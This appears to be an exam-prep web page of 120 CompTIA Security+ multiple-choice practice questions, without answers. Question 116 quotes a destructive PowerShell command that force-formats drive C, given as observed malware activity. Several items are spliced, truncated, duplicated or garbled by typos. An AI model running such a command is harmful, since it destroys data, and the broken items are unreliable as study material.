Summer Special Limited Time Flat 70% Discount offer - Ends in 0d 00h 00m 00s - Coupon code: 70spcl

CompTIA SY0-601 CompTIA Security+ Exam 2021 Exam Practice Test

Page: 1 / 106
Total 1063 questions

CompTIA Security+ Exam 2021 Questions and Answers

Question 1

The marketing department set up its own project management software without telling the appropriate departments. Which of the following describes this scenario?

Options:

A.

Shadow IT

B.

Insider threat

C.

Data exfiltration

D.

Service disruption

Question 2

Which of the following should a security operations center use to improve its incident response procedure?

Options:

A.

Playbooks

B.

Frameworks

C.

Baselines

D.

Benchmarks

Question 3

A security administrator is reviewing reports about suspicious network activity occurring on a subnet Users on the network report that connectivity to various websites is intermittent. The administrator logs in to a workstation and reviews the following command output:

Question # 3

Which of the following best describes what is occurring on the network?

Options:

A.

ARP poisoning

B.

On-path attack

C.

URL redirection

D.

IP address conflicts

Question 4

Which of the following allows for the attribution of messages to individuals?

Options:

A.

Adaptive identity

B.

Non-repudiation

C.

Authentication

D.

Access logs

Question 5

Which of the following is best used to detect fraud by assigning employees to different roles?

Options:

A.

Least privilege

B.

Mandatory vacation

C.

Separation of duties

D.

Job rotation

Question 6

The security operations center is researching an event concerning a suspicious IP address. A security analyst looks at the following event logs and discovers that a significant portion of the user accounts have experienced failed log-in attempts when authenticating event logs and discovers that a significant portion of the user accounts have experienced failed log-in attempts when authenticating from the same IP address:

Question # 6

Which of the following most likely describes the attack that took place?

Options:

A.

Spraying

B.

Brute-force

C.

Dictionary

D.

Rainbow table

Question 7

A company would like to implement a network security solution to inspect traffic on the network and generate an alert when specific traffic patterns are observed. The solution should never block legitimate network traffic. Which of the following will the company most likely implement?

Options:

A.

NIDS

B.

HIPS

C.

ACLs

D.

WAF

Question 8

A security analyst at an organization observed several user logins from outside the organization's network The analyst determined that these logins were not performed by individuals within the organization Which of the following recommendations would reduce the likelihood of future attacks? (Select two).

Options:

A.

Disciplinary actions for users

B.

Conditional access policies

C.

More regular account audits

D.

implementation of additional authentication factors

E.

Enforcement of content filtering policies

F.

A review of user account permissions

Question 9

Which of the following alert types is the most likely to be ignored over time?

Options:

A.

True positive

B.

True negative

C.

False positive

D.

False negative

Question 10

Which of the following attributes would be the most appropriate to apply when implementing MFA?

Options:

A.

Validating the user's location

B.

Requiring the user to identify images based on content

C.

Having the user agree to terms of service

D.

Enforcing the inclusion of special characters in user passwords

Question 11

Which of the following should a security operations center use to improve. Which of the following access controls is most likely inhibiting the transfer?

Options:

A.

Attribute-based

B.

Time of day

C.

Role-based

D.

Least privilege

Question 12

After a web server was migrated to a cloud environment, user access to that server was blocked. Even though an on-premises firewall configuration has been modified to reflect the cloud infrastructure, users are still experiencing access issues. Which of the following most likely needs to be configured?

Options:

A.

Security group

B.

Load balancer pool

C.

Resource allocation

D.

Storage permissions

E.

URL filter

Question 13

Which of the following techniques would most likely be used as a part of an insider threat reduction strategy to uncover relevant indicators?

Options:

A.

Blocking known file sharing sites

B.

Requiring credit monitoring

C.

Implementing impossible travel alerts

D.

Performing security awareness training

Question 14

A company wants to ensure that all devices are secured properly through the MDM solution so that, if remote wipe fails, access to the data will still be inaccessible offline. Which of the following would need to be configured?

Options:

A.

Full device encryption

B.

Geolocation

C.

Screen locks

D.

Content management

Question 15

A security operations center would like to be able to test and observe the behavior of new software executables for malicious activity. Which of the following should the security operations center implement?

Options:

A.

Fuzzing

B.

OS hardening

C.

Sandboxing

D.

Trusted Platform Module

Question 16

A security administrator is working to secure company data on corporate laptops in case the laptops are stolen. Which of the following solutions should the administrator consider?

Options:

A.

Disk encryption

B.

Data loss prevention

C.

Operating system hardening

D.

Boot security

Question 17

A security team is conducting a review of the company's SaaS and PaaS security postures. Which of the following is the best source of secure architecture guidance for these environments?

Options:

A.

ISO

B.

CSA

C.

PCI DSS

D.

SOC 2

Question 18

A company is required to use certified hardware when building networks. Which of the following best addresses the risks associated with procuring counterfeit hardware?

Options:

A.

A thorough analysis of the supply chain

B.

A legally enforceable corporate acquisition policy

C.

A right to audit clause in vendor contracts and SOWs

D.

An in-depth penetration test of all suppliers and vendors

Question 19

Which of the following is used to describe discrete characteristics of a potential weakness that results in a seventy number?

Options:

A.

CVSS

B.

CVE

C.

CAR

D.

CERT

Question 20

During an investigation, an incident response team attempts to understand the source of an incident. Which of the following incident response activities describes this process?

Options:

A.

Analysis

B.

Lessons learned

C.

Detection

D.

Containment

Question 21

A security audit of an organization revealed that most of the IT staff members have domain administrator credentials and do not change the passwords regularly. Which of the following solutions should the security team propose to resolve the findings in the most complete way?

Options:

A.

Creating group policies to enforce password rotation on domain administrator credentials

B.

Reviewing the domain administrator group, removing all unnecessary administrators, and rotating all passwords

C.

Integrating the domain administrator's group with an IdP and requiring SSO with MFA for all access

D.

Securing domain administrator credentials in a PAM vault and controlling access with role-based access control

Question 22

While investigating a recent security breach an analyst finds that an attacker gained access by SQL injection through a company website Which of the following should the analyst recommend to the website developers to prevent this from reoccurring?

Options:

A.

Secure cookies

B.

Input sanitization

C.

Code signing

D.

Blocklist

Question 23

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given all the developer's documentation about the internal architecture. Which of the following best represents the type of testing that will occur?

Options:

A.

Bug bounty

B.

White-box

C.

Black-box

D.

Gray-box

Question 24

A software developer would like to ensure the source code cannot be reverse engineered or debugged. Which of the following should the developer consider?

Options:

A.

version control

B.

Obfuscation toolkit

C.

Code reuse

D.

Continuous integration

E.

Stored procedures

Question 25

A security analyst needs to harden access to a network. One of the requirements is to authenticate users with smart cards. Which of the following should the analyst enable to best meet this requirement?

Options:

A.

CHAP

B.

PEAP

C.

MS-CHAPv2

D.

EAP-TLS

Question 26

Which of the following describes how applications are built, configured, and deployed?

Options:

A.

Provisioning

B.

Continuous validation

C.

Compiler

D.

Normalization

Question 27

experienced railed log-in attempts when authenticating from the same IP address:

184.168.131.241 - userA - failed authentication

184.168.131.241 - userA - failed authentication

184.168.131.241 - userB - failed authentication

184.168.131.241 - userB - failed authentication

184.168.131.241 - userC - failed authentication

184.168.131.241 - userC - failed authentication

Which of the following most likely describes the attack that took place?

Options:

A.

Spraying

B.

Brute-force

C.

Dictionary

D.

Rainbow table

Question 28

The Chief Information Security Officer (CISO) asks a security analyst to install an OS update to a production VM that has a 99% uptime SLA. The CISO tells the analyst the installation must be done as quickly as possible. Which of the following courses of action should the security analyst take first?

Options:

A.

Log in to the server and perform a health check on the VM.

B.

Install the patch immediately.

C.

Confirm that the backup service is running.

D.

Take a snapshot of the VM.

Question 29

Which of the following is used to add extra complexity before using a one-way data transformation algorithm?

Options:

A.

Key stretching

B.

Data masking

C.

Steganography

D.

Salting

Question 30

A client demands at least 99.99% uptime from a service provider's hosted security services. Which of the following documents includes the information the service provider should return to the client?

Options:

A.

MOA

B.

SOW

C.

MOU

D.

SLA

Question 31

Which of the following would best explain why a security analyst is running daily vulnerability scans on all corporate endpoints?

Options:

A.

To track the status of patching installations

B.

To find shadow IT cloud deployments

C.

To continuously the monitor hardware inventory

D.

To hunt for active attackers in the network

Question 32

Which of the following agreement types defines the time frame in which a vendor needs to respond?

Options:

A.

SOW

B.

SLA

C.

MOA

D.

MOU

Question 33

To improve the security at a data center, a security administrator implements a CCTV system and posts several signs about the possibility of being filmed. Which of the following best describe these types of controls? (Select two).

Options:

A.

Preventive

B.

Deterrent

C.

Corrective

D.

Directive

E.

Compensating

F.

Detective

Question 34

Which of the following is the most effective way to protect an application server running software that is no longer supported from network threats?

Options:

A.

Air gap

B.

Barricade

C.

Port security

D.

Screened subnet

Question 35

Which of the following assists in training employees on the importance of cybersecurity?

Options:

A.

Phishing campaigns

B.

Acceptable use policy

C.

Employee handbook

D.

Social media analysis

Question 36

A security analyst needs to propose a remediation plan for each item in a risk register. The item with the highest priority requires employees to have separate logins for SaaS solutions and different password complexity requirements for each solution. Which of the following implementation plans will most likely resolve this security issue?

Options:

A.

Creating a unified password complexity standard

B.

Integrating each SaaS solution with the identity provider

C.

Securing access to each SaaS by using a single wildcard certificate

D.

Configuring geofencing on each SaaS solution

Question 37

Which of the following can a security director use to prioritize vulnerability patching within a company's IT environment?

Options:

A.

SOAR

B.

CVSS

C.

SIEM

D.

CVE

Question 38

An organization wants to reduce the likelihood that a data breach could result in reputational. financial, or regulatory consequences. The organization needs an enterprise-wide solution that does not require new technology or specialized roles Which of the following describes the best way to achieve these goals?

Options:

A.

Developing a process where sensitive data is converted to non-sensitive values such as a token

B.

Masking identifiable information so the data cannot be traced back to a specific user

C.

Incorporating the principle of data minimization throughout business processes

D.

Requiring users and customers to consent to the processing of their information

Question 39

An analyst is reviewing an incident in which a user clicked on a link in a phishing email. Which of the following log sources would the analyst utilize to determine whether the connection was successful?

Options:

A.

Network

B.

System

C.

Application

D.

Authentication

Question 40

A security analyst finds that a user's name appears in a database entry at a time when the user was on vacation. The security analyst reviews the following logs from the authentication server that is being used by the database:

Question # 40

Which of the following can the security analyst conclude based on the review?

Options:

A.

A brute-force attack occurred.

B.

A rainbow table uncovered the password.

C.

Technical controls did not block the reuse of a password.

D.

An attacker used password spraying.

Question 41

A company is providing laptops to all employees and the Chief Information Security Officer is concerned about protecting information if devices are lost or stolen. Which of the following would help mitigate the threat of unauthorized access to unencrypted data?

Options:

A.

UEFI

B.

EDR

C.

HIDS

D.

TPM

Question 42

A security analyst reviews domain activity logs and notices the following:

Question # 42

Which of the following is the best explanation for what the security analyst has discovered?

Options:

A.

The user jsmith's account has been locked out.

B.

A keylogger is installed on jsmith's workstation.

C.

An attacker is attempting to brute force jsmith's account.

D.

Ransomware has been deployed in the domain.

Question 43

A security engineer needs to configure an NGFW to minimize the impact of the increasing number of various traffic types during attacks. Which of the following types of rules is the engineer the most likely to configure?

Options:

A.

Signature-based

B.

Behavioral-based

C.

URL-based

D.

Agent-based

Question 44

An analyst is providing feedback on an incident that involved an unauthorized zone transfer and an on-path attack in a corporate network. The analyst's recommendation is to implement secure DNS. Which of the following would be the most beneficial result of this action?

Options:

A.

Ensuring that data has not been modified in transit

B.

Providing redundancy in the event of a server failure

C.

Preventing unauthenticated clients access to the server

D.

Allowing for IPv6-enabled hosts to leverage the server

Question 45

An organization is required to maintain financial data records for three years and customer data for five years. Which of the following data management policies should the organization implement?

Options:

A.

Retention

B.

Destruction

C.

Inventory

D.

Certification

Question 46

A company hired a security manager from outside the organization to lead security operations. Which of the following actions should the security manager perform first in this new role?

Options:

A.

Establish a security baseline.

B.

Review security policies.

C.

Adopt security benchmarks.

D.

Perform a user ID revalidation.

Question 47

Which of the following is the best reason to complete an audit in a banking environment?

Options:

A.

Regulatory requirement

B.

Organizational change

C.

Self-assessment requirement

D.

Service-level requirement

Question 48

A company is concerned about weather events causing damage to the server room and downtime. Which of the following should the company consider?

Options:

A.

Clustering servers

B.

Geographic dispersion

C.

Load balancers

D.

Off-site backups

Question 49

Two companies are in the process of merging. The companies need to decide how to standardize the

Options:

A.

Shared deployment of CIS baselines

B.

Joint cybersecurity best practices

C.

Both companies following the same CSF

D.

Assessment of controls in a vulnerably report

Question 50

An employee recently resigned from a company. The employee was responsible for managing and supporting weekly batch jobs over the past five years. A few weeks after the employee resigned, one of the batch jobs failed and caused a major disruption. Which of the following would work best to prevent this type of incident from reoccurring?

Options:

A.

Job rotation

B.

Retention

C.

Outsourcing

D.

Separation of duties

Question 51

Which of the following security program audits includes a comprehensive evaluation of the security controls in place at an organization over a six- to 12-month time period?

Options:

A.

NIST CSF

B.

SOC 2 Type II

C.

ISO 27001

D.

PCI DSS

Question 52

A recent vulnerability scan revealed multiple servers have non-standard ports open for applications that are no longer in use. The security team is working to ensure all devices are patched and hardened. Which of the following would the security team perform to ensure the task is completed with minimal impact to production?

Options:

A.

Enable HIDS on all servers and endpoints.

B.

Disable unnecessary services.

C.

Configure the deny list appropriately on the NGFW.

D.

Ensure the antivirus is up to date.

Question 53

A systems administrator is considering switching from tape backup to an alternative backup solution that would allow data to be readily available in the event of a disaster. Which of the following backup types should the administrator implement?

Options:

A.

Copy

B.

Incremental

C.

Cloud

D.

Disk

E.

Storage area network

Question 54

A governance, risk, and compliance team created a report that notes the existence of a chlorine processing facility two miles from one of the company offices. Which of the following describes this type of documentation?

Options:

A.

Site risk assessment

B.

Environmental impact report

C.

Disaster recovery plan

D.

Physical risk register

Question 55

An analyst observed an unexpected high number of DE authentication on requests being sent from an unidentified device on the network. Which of the following attacks was most likely executed in this scenario?

Options:

A.

Jamming

B.

Blue jacking

C.

Rogue access point

D.

Disassociation

Question 56

A systems administrator at a healthcare organization is setting up a server to securely store patient data. Which of the following must be ensured when storing PHI?

Options:

A.

Authorization

B.

Availability

C.

Confidentiality

D.

Integrity

Question 57

Which of the following is the most likely outcome if a large bank fails an internal PCI DSS compliance assessment?

Options:

A.

Fines

B.

Audit findings

C.

Sanctions

D.

Reputation damage

Question 58

A vulnerability scan returned the following results:

2 Critical

5 High

15 Medium

98 Low

Which of the following would the information security team most likely use to decide if all discovered vulnerabilities must be addressed and the order in which they should be addressed?

Options:

A.

Risk appetite

B.

Risk register

C.

Risk matrix

D.

Risk acceptance

Question 59

Which of the following describes the understanding between a company and a client about what will be provided and the accepted time needed to provide the company with the resumes?

Options:

A.

SLA

B.

MOU

C.

MOA

D.

BPA

Question 60

An organization developed a virtual thin client running in kiosk mode mat is used to access various software depending on the users' roles During a security evaluation, the test team identified the ability to exit kiosk mode and access system-level resources which led to privilege escalation Which of the following mitigations addresses this finding?

Options:

A.

Using application approved/dented lists

B.

Incorporating web content filtering

C.

Enforcing additional firewall rules

D.

Implementing additional network segmentation

Question 61

Users at a company are reporting they are unable to access the URL for a new retail website because it is flagged as gambling and is being blocked. Which of the following changes would allow users to access the site?

Options:

A.

Creating a firewall rule to allow HTTPS traffic

B.

Configuring the IPS to allow shopping

C.

Tuning the DLP rule that detects credit card data

D.

Updating the categorization in the content filter

Question 62

An administrator notices that several users are logging in from suspicious IP addresses. After speaking with the users, the administrator determines that the employees were not logging in from those IP addresses and resets the affected users' passwords. Which of the following should the administrator implement to prevent this type of attack from succeeding in the future?

Options:

A.

Multifactor authentication

B.

Permissions assignment

C.

Access management

D.

Password complexity

Question 63

While performing digital forensics. which of the following is considered the most volatile and should have the contents collected first?

Options:

A.

Hard drive

B.

RAM

C.

SSD

D.

Temporary files

Question 64

A security team received the following requirements for a new BYOD program that will allow employees to use personal smartphones to access business email:

• Sensitive customer data must be safeguarded

• Documents from managed sources should not be opened in unmanaged destinations.

• Sharing of managed documents must be disabled,

• Employees should not be able to download emailed images to their devices.

• Personal photos and contact lists must be kept private.

• IT must be able to remove data from lost/stolen devices or when an employee no longer works for the company.

Which of the following are the best features to enable to meet these requirements? (Select two).

Options:

A.

Remote wipe

B.

VPN connection

C.

Biometric authentication

D.

Device location tracking

E.

Geofencing

F.

Application approve list

G.

Containerization

Question 65

Which Of the following is the best method for ensuring non-repudiation?

Options:

A.

SSO

B.

Digital certificate

C.

Token

D.

SSH key

Question 66

A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

Options:

A.

Setting an explicit deny to all traffic using port 80 instead of 443

B.

Moving the implicit deny from the bottom of the rule set to the top

C.

Configuring the first line in the rule set to allow all traffic

D.

Ensuring that port 53 has been explicitly allowed in the rule set

Question 67

An organization has hired a security analyst to perform a penetration test The analyst captures 1Gb worth of inbound network traffic to the server and transfers the pcap back to the machine for

analysis. Which of the following tools should the analyst use to further review the pcap?

Options:

A.

Nmap

B.

CURL

C.

Neat

D.

Wireshark

Question 68

A security analyst is taking part in an evaluation process that analyzes and categorizes threat actors Of real-world events in order to improve the incident response team's process. Which Of the following is the analyst most likely participating in?

Options:

A.

MITRE ATT&CK

B.

Walk-through

C.

Red team

D.

Purple team-I

E.

TAXI

Question 69

An information security officer at a credit card transaction company is conducting a framework-mapping exercise with the internal controls. The company recently established a new office in Europe. To which of the following frameworks should the security officer map the existing controls' (Select two).

Options:

A.

ISO

B.

PCI DSS

C.

SOC

D.

GDPR

E.

CSA

F.

NIST

Question 70

A company wants the ability to restrict web access and monitor the websites that employees visit, Which Of the following would best meet these requirements?

Options:

A.

Internet Proxy

B.

VPN

C.

WAF

D.

Firewall

Question 71

A network penetration tester has successfully gained access to a target machine. Which of the following should the penetration tester do next?

Options:

A.

Clear the log files of all evidence

B.

Move laterally to another machine.

C.

Establish persistence for future use.

D.

Exploit a zero-day vulnerability.

Question 72

A building manager is concerned about people going in and out of the office during non-working hours. Which of the following physical security controls would provide the best solution?

Options:

A.

Cameras

B.

Badges

C.

Locks

D.

Bollards

Question 73

A company recently suffered a breach in which an attacker was able to access the internal mail servers and directly access several user inboxes. A large number of email messages were later posted online. Which of the following would bast prevent email contents from being released should another breach occur?

Options:

A.

Implement S/MIME to encrypt the emails at rest.

B.

Enable full disk encryption on the mail servers.

C.

Use digital certificates when accessing email via the web.

D.

Configure web traffic to only use TLS-enabled channels.

Question 74

A cyber security administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall Which of the following would be the best option to remove the rules?

Options:

A.

# iptables -t mangle -X

B.

# iptables -F

C.

# iptables -2

D.

# iptables -P INPUT -j DROP

Question 75

To reduce and limit software and infrastructure costs the Chief Information Officer has requested to move email services to the cloud. The cloud provider and the organization must have secunty controls to protect sensitive data Which of the following cloud services would best accommodate the request?

Options:

A.

laaS

B.

PaaS

C.

DaaS

D.

SaaS

Question 76

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be best to use to update and reconfigure the OS-level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Question 77

Which of the following cloud models provides clients with servers, storage, and networks but nothing else?

Options:

A.

SaaS

B.

PaaS

C.

laaS

D.

DaaS

Question 78

A report delivered to the Chief Information Security Officer (CISO) shows that some user credentials could be exfiltrated. The report also indicates that users tend to choose the same credentials on different systems and applications. Which of the following policies should the CISO use to prevent someone from using the exfiltrated credentials?

Options:

A.

MFA

B.

Lockout

C.

Time-based logins

D.

Password history

Question 79

An annual information security has revealed that several OS-level configurations are not in compliance due to Outdated hardening standards the company is using Which Of the following would be best to use to update and reconfigure the OS.level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Question 80

Which of the following is most likely to contain ranked and ordered information on the likelihood and potential impact of catastrophic events that may affect business processes and systems, while also highlighting the residual risks that need to be managed after mitigating controls have been implemented?

Options:

A.

An RTO report

B.

A risk register

C.

A business impact analysis

D.

An asset value register

E.

A disaster recovery plan

Question 81

A systems administrator is required to enforce MFA for corporate email account access, relying on the possession factor. Which of the following authentication methods should the systems administrator choose? (Select two).

Options:

A.

passphrase

B.

Time-based one-time password

C.

Facial recognition

D.

Retina scan

E.

Hardware token

F.

Fingerprints

Question 82

Which of the following would help ensure a security analyst is able to accurately measure the overall risk to an organization when a new vulnerability is disclosed?

Options:

A.

A full inventory of all hardware and software

B.

Documentation of system classifications

C.

A list of system owners and their departments

D.

Third-party risk assessment documentation

Question 83

Which of the following would be the best resource for a software developer who is looking to improve secure coding practices for web applications?

Options:

A.

OWASP

B.

Vulnerability scan results

C.

NIST CSF

D.

Third-party libraries

Question 84

A security administrator needs to inspect in-transit files on the enterprise network to search for PI I credit card data, and classification words Which of the following would be the best to use?

Options:

A.

IDS solution

B.

EDR solution

C.

HIPS software solution

D.

Network DLP solution

Question 85

A security architect is designing a remote access solution for a business partner. The business partner needs to access one Linux server at the company. The business partner wants to avid managing a password for authentication and additional software installation. Which of the following should the architect recommend?

Options:

A.

Soft token

B.

Smart card

C.

CSR

D.

SSH key

Question 86

A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility issues. The OSs are still supported by the vendor but the industrial software is no longer supported The Chief Information Security Officer has created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, white also creating backups of the systems for recovery. Which of the following resiliency techniques will provide these capabilities?

Options:

A.

Redundancy

B.

RAID 1+5

C.

Virtual machines

D.

Full backups

Question 87

A security analyst is investigating what appears to be unauthorized access to a corporate web application. The security analyst reviews the web server logs and finds the following entries:

Question # 87

Which of the following password attacks is taking place?

Options:

A.

Dictionary

B.

Brute-force

C.

Rainbow table

D.

Spraying

Question 88

Which of the following is a primary security concern for a company setting up a BYOD program?

Options:

A.

End of life

B.

Buffer overflow

C.

VM escape

D.

Jailbreaking

Question 89

A company wants to deploy PKI on its internet-facing website The applications that are currently deployed are

• www company.com (mam website)

• contact us company com (for locating a nearby location)

• quotes company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store company com Which of the following certificate types would best meet the requirements?

Options:

A.

SAN

B.

Wildcard

C.

Extended validation

D.

Self-signed

Question 90

An audit identified Pll being utilized in the development environment of a crit-ical application. The Chief Privacy Officer (CPO) is adamant that this data must be removed: however, the developers are concerned that without real data they cannot perform functionality tests and search for specific data. Which of the following should a security professional implement to best satisfy both the CPOs and the development team's requirements?

Options:

A.

Data purge

B.

Data encryption

C.

Data masking

D.

Data tokenization

Question 91

Which of the following types of controls is a turnstile?

Options:

A.

Physical

B.

Detective

C.

Corrective

D.

Technical

Question 92

Which of the following automation use cases would best enhance the security posture Of an organi-zation by rapidly updating permissions when employees leave a company Or change job roles inter-nally?

Options:

A.

Provisioning resources

B.

Disabling access

C.

APIs

D.

Escalating permission requests

Question 93

A government organization is developing an advanced Al defense system. Develop-ers are using information collected from third-party providers Analysts are no-ticing inconsistencies in the expected powers Of then learning and attribute the Outcome to a recent attack on one of the suppliers. Which of the following IS the most likely reason for the inaccuracy of the system?

Options:

A.

Improper algorithms security

B.

Tainted training data

C.

virus

D.

Cryptomalware

Question 94

A customer called a company's security team to report that all invoices the customer has received over the last five days from the company appear to have fraudulent banking details. An investigation into the matter reveals the following

• The manager of the accounts payable department is using the same password across multiple external websites and the corporate account

• One of the websites the manager used recently experienced a data breach.

• The manager's corporate email account was successfully accessed in the last five days by an IP address located in a foreign country.

Which of the following attacks has most likely been used to compromise the manager's corporate account?

Options:

A.

Remote access Trojan

B.

Brute-force

C.

Dictionary

D.

Credential stuffing

E.

Password spraying

Question 95

Which of the following supplies non-repudiation during a forensics investigation?

Options:

A.

Dumping volatile memory contents first

B.

Duplicating a drive with dd

C.

a SHA 2 signature of a drive image

D.

Logging everyone in contact with evidence

E.

Encrypting sensitive data

Question 96

Which Of the following is a primary security concern for a setting up a BYOD program?

Options:

A.

End of life

B.

Buffer overflow

C.

VM escape

D.

Jailbreaking

Question 97

An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and SFTP, and to specifically block FTP. Which of the following would BEST accomplish this goal?

Options:

A.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 67 -Allow: Any Any 68 -Allow: Any Any 22 -Deny: Any Any 21 -Deny: Any Any

B.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 67 -Allow: Any Any 68 -Deny: Any Any 22 -Allow: Any Any 21 -Deny: Any Any

C.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Allow: Any Any 22 -Deny: Any Any 67 -Deny: Any Any 68 -Deny: Any Any 21 -Allow: Any Any

D.

[Permission Source Destination Port]Allow: Any Any 80 -Allow: Any Any 443 -Deny: Any Any 67 -Allow: Any Any 68 -Allow: Any Any 22 -Allow: Any Any 21 -Allow: Any Any

Question 98

While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The technician updates the policy, but the new policy causes several company servers to become unreachable. Which of the following actions would prevent this issue?

Options:

A.

Documenting the new policy in a change request and submitting the request to change management

B.

Testing the policy in a non-production environment before enabling the policy in the production network

C.

Disabling any intrusion prevention signatures on the "deny any" policy prior to enabling the new policy

D.

Including an "allow any" policy above the "deny any" policy

Question 99

A company is developing a business continuity strategy and needs to determine how many staff members would be required to sustain the business in the case of a disruption.

Which of the following best describes this step?

Options:

A.

Capacity planning

B.

Redundancy

C.

Geographic dispersion

D.

Tabletop exercise

Question 100

During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release a patch within the next quarter. Which of the following best describes this type of vulnerability?

Options:

A.

Legacy operating system

B.

Weak configuration

C.

Zero day

D.

Supply chain

Question 101

A security analyst is hardening a network infrastructure The analyst is given the following requirements

• Preserve the use of public IP addresses assigned to equipment on the core router

• Enable "in transport" encryption protection to the web server with the strongest ciphers.

Which of the following should the analyst implement to meet these requirements? (Select two).

Options:

A.

Configure VLANs on the core router

B.

Configure NAT on the core router.

C.

Configure BGP on the core router

D.

Enable AES encryption on the web server

E.

Enable 3DES encryption on the web server

F.

Enable TLSv2 encryption on the web server

Question 102

An audit report indicates multiple suspicious attempts to access company resources were made. These attempts were not detected by the company. Which of the following would be the best solution to implement on the company's network?

Options:

A.

Intrusion prevention system

B.

Proxy server

C.

Jump server

D.

Security zones

Question 103

Security analysts notice a server login from a user who has been on vacation for two weeks, The an-alysts confirm that the user did not log in to the system while on vacation After reviewing packet capture the analysts notice the following:

Which of the following occurred?

Options:

A.

A buffer overflow was exploited to gain unauthorized access.

B.

The user's account was con-promised, and an attacker changed the login credentials.

C.

An attacker used a pass-the-hash attack to gain access.

D.

An insider threat with username logged in to the account.

Question 104

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

Options:

A.

HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

B.

HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

C.

HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

D.

HTTPS://".comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

Question 105

An organization is repairing the damage after an incident. Which of the following controls is being implemented?

Options:

A.

Detective

B.

Preventive

C.

Corrective

D.

Compensating

Question 106

Which of the following terms should be included in a contract to help a company monitor the ongo-ing security maturity Of a new vendor?

Options:

A.

A right-to-audit clause allowing for annual security audits

B.

Requirements for event logs to kept for a minimum of 30 days

C.

Integration of threat intelligence in the companys AV

D.

A data-breach clause requiring disclosure of significant data loss

Question 107

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to best meet the requirement?

Options:

A.

Fog computing and KVMs

B.

VDI and thin clients

C.

Private cloud and DLP

D.

Full drive encryption and thick clients

Question 108

Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?

Options:

A.

Compensating control

B.

Network segmentation

C.

Transfer of risk

D.

SNMP traps

Question 109

A company is adopting a BYOD policy and is looking for a comprehensive solution to protect company information on user devices. Which of the following solutions would best support the policy?

Options:

A.

Mobile device management

B.

Full device encryption

C.

Remote wipe

D.

Biometrics

Question 110

A research company discovered that an unauthorized piece of software has been detected on a small number of machines in its lab The researchers collaborate with other machines using port 445 and on the internet using port 443 The unau-thorized software is starting to be seen on additional machines outside of the lab and is making outbound communications using HTTPS and SMS. The security team has been instructed to resolve the issue as quickly as possible while causing minimal disruption to the researchers. Which of the following is the best course Of

action in this scenario?

Options:

A.

Update the host firewalls to block outbound Stv1B.

B.

Place the machines with the unapproved software in containment

C.

Place the unauthorized application in a Bocklist.

D.

Implement a content filter to block the unauthorized software communica-tion,

Question 111

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following would be the most acceptable?

Options:

A.

SED

B.

HSM

C.

DLP

D.

TPM

Question 112

A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline. The manager would like to implement a high availability pair to:

Options:

A.

decrease the mean time between failures.

B.

remove the single point of failure.

C.

cut down the mean time to repair

D.

reduce the recovery time objective

Question 113

An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50 employees working on any given day. Which of the following VPN solutions would best support the new office?

Options:

A.

Always-on

B.

Remote access

C.

Site-to-site

D.

Full tunnel

Question 114

An analyst is working on an email security incident in which the target opened an attachment containing a worm. The analyst wants to Implement mitigation techniques to prevent further spread. Which of the following is the best course of action for the analyst to take?

Options:

A.

Apply a DLP solution.

B.

Implement network segmentation.

C.

Utilize email content filtering.

D.

Isolate the infected attachment.

Question 115

Which of the following would be used to find the most common web-applicalion vulnerabilities?

Options:

A.

OWASP

B.

MITRE ATT&CK

C.

Cyber Kill Chain

D.

SDLC

Question 116

A user downloaded an extension for a browser, and the user's device later became infected. The analyst who Is Investigating the Incident saw various logs where the attacker was hiding activity by deleting data. The following was observed running:

New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C| Format-Volume -Driveletter C - FileSystemLabel "New"-FileSystem NTFS - Full -Force -Confirm:$false

Which of the following is the malware using to execute the attack?

Options:

A.

PowerShell

B.

Python

C.

Bash

D.

Macros

Question 117

A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to manipulate the parameters being passed to the API endpoint. Which of the following solutions would best help to protect against the attack?

Options:

A.

DLP

B.

SIEM

C.

NIDS

D.

WAF

Question 118

Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

Options:

A.

Persistence

B.

Port scanning

C.

Privilege escalation

D.

Pharming

Question 119

A company needs to centralize its logs to create a baseline and have visibility on its security events Which of the following technologies will accomplish this objective?

Options:

A.

Security information and event management

B.

A web application firewall

C.

A vulnerability scanner

D.

A next-generation firewall

Question 120

Which of the following threat actors is most likely to be motivated by ideology?

Options:

A.

Business competitor

B.

Hacktivist

C.

Criminal syndicate

D.

Script kiddie

E.

